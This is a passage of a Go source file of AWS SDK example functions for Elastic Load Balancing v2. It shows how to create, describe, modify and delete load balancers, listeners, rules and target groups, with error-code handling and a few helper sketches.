} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
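// A hedged follow-up sketch: a newly created load balancer starts out
// provisioning, and the SDK's waiter (assumed here to be
// WaitUntilLoadBalancerAvailable, following the standard waiter pattern)
// polls DescribeLoadBalancers until it becomes active. The name is a placeholder.
func waitForLoadBalancer(svc *elbv2.ELBV2) {
input := &elbv2.DescribeLoadBalancersInput{
Names: []*string{
aws.String("my-load-balancer"),
},
}
// Blocks until the load balancer is active or the waiter gives up.
if err := svc.WaitUntilLoadBalancerAvailable(input); err != nil {
fmt.Println(err.Error())
return
}
fmt.Println("load balancer is active")
}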
// To create an internal load balancer
//
// This example creates an internal load balancer and enables the Availability Zones
// for the specified subnets.
func ExampleELBV2_CreateLoadBalancer_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.CreateLoadBalancerInput{
Name: aws.String("my-internal-load-balancer"),
Scheme: aws.String("internal"),
Subnets: []*string{
aws.String("subnet-b7d581c0"),
aws.String("subnet-8360a9e7"),
},
}
result, err := svc.CreateLoadBalancer(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateLoadBalancerNameException:
fmt.Println(elbv2.ErrCodeDuplicateLoadBalancerNameException, aerr.Error())
case elbv2.ErrCodeTooManyLoadBalancersException:
fmt.Println(elbv2.ErrCodeTooManyLoadBalancersException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeSubnetNotFoundException:
fmt.Println(elbv2.ErrCodeSubnetNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidSubnetException:
fmt.Println(elbv2.ErrCodeInvalidSubnetException, aerr.Error())
case elbv2.ErrCodeInvalidSecurityGroupException:
fmt.Println(elbv2.ErrCodeInvalidSecurityGroupException, aerr.Error())
case elbv2.ErrCodeInvalidSchemeException:
fmt.Println(elbv2.ErrCodeInvalidSchemeException, aerr.Error())
case elbv2.ErrCodeTooManyTagsException:
fmt.Println(elbv2.ErrCodeTooManyTagsException, aerr.Error())
case elbv2.ErrCodeDuplicateTagKeysException:
fmt.Println(elbv2.ErrCodeDuplicateTagKeysException, aerr.Error())
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
case elbv2.ErrCodeAllocationIdNotFoundException:
fmt.Println(elbv2.ErrCodeAllocationIdNotFoundException, aerr.Error())
case elbv2.ErrCodeAvailabilityZoneNotSupportedException:
fmt.Println(elbv2.ErrCodeAvailabilityZoneNotSupportedException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create a rule
//
// This example creates a rule that forwards requests to the specified target group
// if the URL contains the specified pattern (for example, /img/*).
func ExampleELBV2_CreateRule_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateRuleInput{
Actions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Type: aws.String("forward"),
},
},
Conditions: []*elbv2.RuleCondition{
{
Field: aws.String("path-pattern"),
Values: []*string{
aws.String("/img/*"),
},
},
},
ListenerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
Priority: aws.Int64(10),
}
result, err := svc.CreateRule(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodePriorityInUseException:
fmt.Println(elbv2.ErrCodePriorityInUseException, aerr.Error())
case elbv2.ErrCodeTooManyTargetGroupsException:
fmt.Println(elbv2.ErrCodeTooManyTargetGroupsException, aerr.Error())
case elbv2.ErrCodeTooManyRulesException:
fmt.Println(elbv2.ErrCodeTooManyRulesException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To create a target group
//
// This example creates a target group that you can use to route traffic to targets
// using HTTP on port 80. This target group uses the default health check configuration.
func ExampleELBV2_CreateTargetGroup_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.CreateTargetGroupInput{
Name: aws.String("my-targets"),
Port: aws.Int64(80),
Protocol: aws.String("HTTP"),
VpcId: aws.String("vpc-3ac0fb5f"),
}
result, err := svc.CreateTargetGroup(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateTargetGroupNameException:
fmt.Println(elbv2.ErrCodeDuplicateTargetGroupNameException, aerr.Error())
case elbv2.ErrCodeTooManyTargetGroupsException:
fmt.Println(elbv2.ErrCodeTooManyTargetGroupsException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
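// A hedged sketch showing how the pieces connect: CreateTargetGroup returns
// the new group's ARN in result.TargetGroups, which is exactly what a
// follow-up RegisterTargets call needs. The instance ID is a placeholder.
func registerWithNewGroup(svc *elbv2.ELBV2, created *elbv2.CreateTargetGroupOutput) error {
if len(created.TargetGroups) == 0 {
return fmt.Errorf("CreateTargetGroup returned no target groups")
}
_, err := svc.RegisterTargets(&elbv2.RegisterTargetsInput{
TargetGroupArn: created.TargetGroups[0].TargetGroupArn,
Targets: []*elbv2.TargetDescription{
{Id: aws.String("i-0f76fade")}, // placeholder instance ID
},
})
return err
}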
// To delete a listener
//
// This example deletes the specified listener.
func ExampleELBV2_DeleteListener_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteListenerInput{
ListenerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
}
result, err := svc.DeleteListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To delete a load balancer
//
// This example deletes the specified load balancer.
func ExampleELBV2_DeleteLoadBalancer_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteLoadBalancerInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.DeleteLoadBalancer(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To delete a rule
//
// This example deletes the specified rule.
func ExampleELBV2_DeleteRule_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteRuleInput{
RuleArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/1291d13826f405c3"),
}
result, err := svc.DeleteRule(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeOperationNotPermittedException:
fmt.Println(elbv2.ErrCodeOperationNotPermittedException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To delete a target group
//
// This example deletes the specified target group.
func ExampleELBV2_DeleteTargetGroup_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeleteTargetGroupInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.DeleteTargetGroup(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeResourceInUseException:
fmt.Println(elbv2.ErrCodeResourceInUseException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To deregister a target from a target group
//
// This example deregisters the specified instance from the specified target group.
func ExampleELBV2_DeregisterTargets_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DeregisterTargetsInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-0f76fade"),
},
},
}
result, err := svc.DeregisterTargets(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a listener
//
// This example describes the specified listener.
func ExampleELBV2_DescribeListeners_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeListenersInput{
ListenerArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
},
}
result, err := svc.DescribeListeners(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe load balancer attributes
//
// This example describes the attributes of the specified load balancer.
func ExampleELBV2_DescribeLoadBalancerAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeLoadBalancerAttributesInput{
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.DescribeLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a load balancer
//
// This example describes the specified load balancer.
func ExampleELBV2_DescribeLoadBalancers_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeLoadBalancersInput{
LoadBalancerArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
}
result, err := svc.DescribeLoadBalancers(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
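// A hedged sketch: DescribeLoadBalancers is paginated, and the example above
// fetches only the first page. The Pages variant below follows the SDK's
// standard pagination pattern and is assumed to exist for this operation.
func listAllLoadBalancers(svc *elbv2.ELBV2) error {
return svc.DescribeLoadBalancersPages(&elbv2.DescribeLoadBalancersInput{},
func(page *elbv2.DescribeLoadBalancersOutput, lastPage bool) bool {
for _, lb := range page.LoadBalancers {
fmt.Println(aws.StringValue(lb.LoadBalancerName))
}
return true // keep fetching pages
})
}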
// To describe a rule
//
// This example describes the specified rule.
func ExampleELBV2_DescribeRules_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeRulesInput{
RuleArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener-rule/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2/9683b2d02a6cabee"),
},
}
result, err := svc.DescribeRules(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a policy used for SSL negotiation
//
// This example describes the specified policy used for SSL negotiation.
func ExampleELBV2_DescribeSSLPolicies_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeSSLPoliciesInput{
Names: []*string{
aws.String("ELBSecurityPolicy-2015-05"),
},
}
result, err := svc.DescribeSSLPolicies(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe the tags assigned to a load balancer
//
// This example describes the tags assigned to the specified load balancer.
func ExampleELBV2_DescribeTags_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTagsInput{
ResourceArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
},
}
result, err := svc.DescribeTags(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeRuleNotFoundException:
fmt.Println(elbv2.ErrCodeRuleNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe target group attributes
//
// This example describes the attributes of the specified target group.
func ExampleELBV2_DescribeTargetGroupAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetGroupAttributesInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.DescribeTargetGroupAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe a target group
//
// This example describes the specified target group.
func ExampleELBV2_DescribeTargetGroups_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetGroupsInput{
TargetGroupArns: []*string{
aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
},
}
result, err := svc.DescribeTargetGroups(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe the health of the targets for a target group
//
// This example describes the health of the targets for the specified target group.
// One target is healthy but the other is not specified in an action, so it can't receive
// traffic from the load balancer.
func ExampleELBV2_DescribeTargetHealth_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetHealthInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
}
result, err := svc.DescribeTargetHealth(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeHealthUnavailableException:
fmt.Println(elbv2.ErrCodeHealthUnavailableException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To describe the health of a target
//
// This example describes the health of the specified target. This target is healthy.
func ExampleELBV2_DescribeTargetHealth_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.DescribeTargetHealthInput{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-targets/73e2d6bc24d8a067"),
Targets: []*elbv2.TargetDescription{
{
Id: aws.String("i-0f76fade"),
Port: aws.Int64(80),
},
},
}
result, err := svc.DescribeTargetHealth(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeInvalidTargetException:
fmt.Println(elbv2.ErrCodeInvalidTargetException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeHealthUnavailableException:
fmt.Println(elbv2.ErrCodeHealthUnavailableException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
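// A hedged sketch for consuming DescribeTargetHealth output: each
// TargetHealthDescription pairs a target with its health state
// ("initial", "healthy", "unhealthy", "draining", ...).
func printTargetStates(result *elbv2.DescribeTargetHealthOutput) {
for _, thd := range result.TargetHealthDescriptions {
// Port may be nil when targets were registered without a port override.
fmt.Printf("%s:%d is %s\n",
aws.StringValue(thd.Target.Id),
aws.Int64Value(thd.Target.Port),
aws.StringValue(thd.TargetHealth.State))
}
}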
// To change the default action for a listener
//
// This example changes the default action for the specified listener.
func ExampleELBV2_ModifyListener_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyListenerInput{
DefaultActions: []*elbv2.Action{
{
TargetGroupArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:targetgroup/my-new-targets/2453ed029918f21f"),
Type: aws.String("forward"),
},
},
ListenerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/f2f7dc8efc522ab2"),
}
result, err := svc.ModifyListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To change the server certificate
//
// This example changes the server certificate for the specified HTTPS listener.
func ExampleELBV2_ModifyListener_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyListenerInput{
Certificates: []*elbv2.Certificate{
{
CertificateArn: aws.String("arn:aws:iam::123456789012:server-certificate/my-new-server-cert"),
},
},
ListenerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:listener/app/my-load-balancer/50dc6c495c0c9188/0467ef3c8400ae65"),
}
result, err := svc.ModifyListener(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeDuplicateListenerException:
fmt.Println(elbv2.ErrCodeDuplicateListenerException, aerr.Error())
case elbv2.ErrCodeTooManyListenersException:
fmt.Println(elbv2.ErrCodeTooManyListenersException, aerr.Error())
case elbv2.ErrCodeTooManyCertificatesException:
fmt.Println(elbv2.ErrCodeTooManyCertificatesException, aerr.Error())
case elbv2.ErrCodeListenerNotFoundException:
fmt.Println(elbv2.ErrCodeListenerNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupNotFoundException:
fmt.Println(elbv2.ErrCodeTargetGroupNotFoundException, aerr.Error())
case elbv2.ErrCodeTargetGroupAssociationLimitException:
fmt.Println(elbv2.ErrCodeTargetGroupAssociationLimitException, aerr.Error())
case elbv2.ErrCodeIncompatibleProtocolsException:
fmt.Println(elbv2.ErrCodeIncompatibleProtocolsException, aerr.Error())
case elbv2.ErrCodeSSLPolicyNotFoundException:
fmt.Println(elbv2.ErrCodeSSLPolicyNotFoundException, aerr.Error())
case elbv2.ErrCodeCertificateNotFoundException:
fmt.Println(elbv2.ErrCodeCertificateNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
case elbv2.ErrCodeUnsupportedProtocolException:
fmt.Println(elbv2.ErrCodeUnsupportedProtocolException, aerr.Error())
case elbv2.ErrCodeTooManyRegistrationsForTargetIdException:
fmt.Println(elbv2.ErrCodeTooManyRegistrationsForTargetIdException, aerr.Error())
case elbv2.ErrCodeTooManyTargetsException:
fmt.Println(elbv2.ErrCodeTooManyTargetsException, aerr.Error())
case elbv2.ErrCodeTooManyActionsException:
fmt.Println(elbv2.ErrCodeTooManyActionsException, aerr.Error())
case elbv2.ErrCodeInvalidLoadBalancerActionException:
fmt.Println(elbv2.ErrCodeInvalidLoadBalancerActionException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To enable deletion protection
//
// This example enables deletion protection for the specified load balancer.
func ExampleELBV2_ModifyLoadBalancerAttributes_shared00() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyLoadBalancerAttributesInput{
Attributes: []*elbv2.LoadBalancerAttribute{
{
Key: aws.String("deletion_protection.enabled"),
Value: aws.String("true"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.ModifyLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To change the idle timeout
//
// This example changes the idle timeout value for the specified load balancer.
func ExampleELBV2_ModifyLoadBalancerAttributes_shared01() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyLoadBalancerAttributesInput{
Attributes: []*elbv2.LoadBalancerAttribute{
{
Key: aws.String("idle_timeout.timeout_seconds"),
Value: aws.String("30"),
},
},
LoadBalancerArn: aws.String("arn:aws:elasticloadbalancing:us-west-2:123456789012:loadbalancer/app/my-load-balancer/50dc6c495c0c9188"),
}
result, err := svc.ModifyLoadBalancerAttributes(input)
if err != nil {
if aerr, ok := err.(awserr.Error); ok {
switch aerr.Code() {
case elbv2.ErrCodeLoadBalancerNotFoundException:
fmt.Println(elbv2.ErrCodeLoadBalancerNotFoundException, aerr.Error())
case elbv2.ErrCodeInvalidConfigurationRequestException:
fmt.Println(elbv2.ErrCodeInvalidConfigurationRequestException, aerr.Error())
default:
fmt.Println(aerr.Error())
}
} else {
// Print the error, cast err to awserr.Error to get the Code and
// Message from an error.
fmt.Println(err.Error())
}
return
}
fmt.Println(result)
}
// To enable access logs
//
// This example enables access logs for the specified load balancer. Note that the S3
// bucket must exist in the same region as the load balancer and must have a policy
// attached that grants access to the Elastic Load Balancing service.
func ExampleELBV2_ModifyLoadBalancerAttributes_shared02() {
svc := elbv2.New(session.New())
input := &elbv2.ModifyLoadBalancerAttributesInput{
Attributes: []*elbv2.LoadBalancerAttribute{
{
Key: aws.String("access_logs.s3.enabled"),
Value: aws.String("true"),
},
{
Key: aws.String("access_logs.s3.bucket"),
Value: aws.String("my-loadbalancer-logs"),
},
{
Key: aws.String("access_logs.s3.prefix"),
Value: aws.String("myapp"),
},
},
